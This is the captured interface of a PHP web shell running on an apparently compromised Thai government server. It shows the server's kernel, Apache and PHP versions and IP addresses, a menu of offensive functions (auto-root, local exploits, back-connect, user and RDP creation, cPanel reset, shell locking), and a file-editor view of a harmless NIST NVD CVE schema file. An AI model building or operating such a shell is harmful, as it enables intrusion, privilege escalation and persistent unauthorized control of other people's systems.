Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
openscap /
schemas /
cve /
[ HOME SHELL ]
Name
Size
Permission
Action
cce_0.1.xsd
2.85
KB
-rw-r--r--
cpe-language_2.1.xsd
8.14
KB
-rw-r--r--
cve_0.1.xsd
3.22
KB
-rw-r--r--
cvss-v2_0.2.xsd
17.27
KB
-rw-r--r--
nvd-cve-feed_2.0.xsd
2.43
KB
-rw-r--r--
patch_0.1.xsd
3.55
KB
-rw-r--r--
scap-core_0.1.xsd
7.6
KB
-rw-r--r--
vulnerability_0.4.xsd
14.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nvd-cve-feed_2.0.xsd
<?xml version="1.0"?> <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns="http://scap.nist.gov/schema/feed/vulnerability/2.0" xmlns:vuln="http://scap.nist.gov/schema/vulnerability/0.4" targetNamespace="http://scap.nist.gov/schema/feed/vulnerability/2.0" elementFormDefault="qualified" attributeFormDefault="unqualified" version="2.0"> <xsd:import namespace="http://scap.nist.gov/schema/vulnerability/0.4" schemaLocation="vulnerability_0.4.xsd"/> <xsd:annotation> <xsd:documentation>TODO: address distributed with for APP->OS resolution</xsd:documentation> <xsd:documentation>This schema defines the structure of the National Vulnerability Database XML feed files version: 1.2. The elements and attribute in this document are described by xsd:annotation tags. This file is kept at http://nvd.nist.gov/schema/nvdcve.xsd. The NVD XML feeds are available at http://nvd.nist.gov/download.cfm. Release Notes: Version 2.0: * Redesign of the feed to integrate with the new vulnerability data model schema. Version 1.2: * CVSS version 2 scores and vectors have been added. Please see http://nvd.nist.gov/cvss.cfm?vectorinfo and http://www.first.org/cvss/cvss-guide.html for more information on how to interpret this data. </xsd:documentation> </xsd:annotation> <xsd:element name="nvd"> <xsd:annotation> <xsd:documentation>The root element of the NVD CVE feed. Multiple "entry" child elements describe specific NVD CVE entries.</xsd:documentation> </xsd:annotation> <xsd:complexType> <xsd:sequence> <xsd:element ref="entry" minOccurs="0" maxOccurs="unbounded"> <xsd:annotation> <xsd:documentation>A CVE entry.</xsd:documentation> </xsd:annotation> </xsd:element> </xsd:sequence> <xsd:attribute name="nvd_xml_version" type="xsd:decimal" use="required"> <xsd:annotation> <xsd:documentation>The schema version number supported by the feed.</xsd:documentation> </xsd:annotation> </xsd:attribute> <xsd:attribute name="pub_date" type="xsd:dateTime" use="required"> <xsd:annotation> <xsd:documentation>The date the feed was generated.</xsd:documentation> </xsd:annotation> </xsd:attribute> </xsd:complexType> </xsd:element> <xsd:element name="entry" type="vuln:vulnerabilityType"> <xsd:annotation> <xsd:documentation>A CVE entry.</xsd:documentation> </xsd:annotation> </xsd:element> </xsd:schema>
Close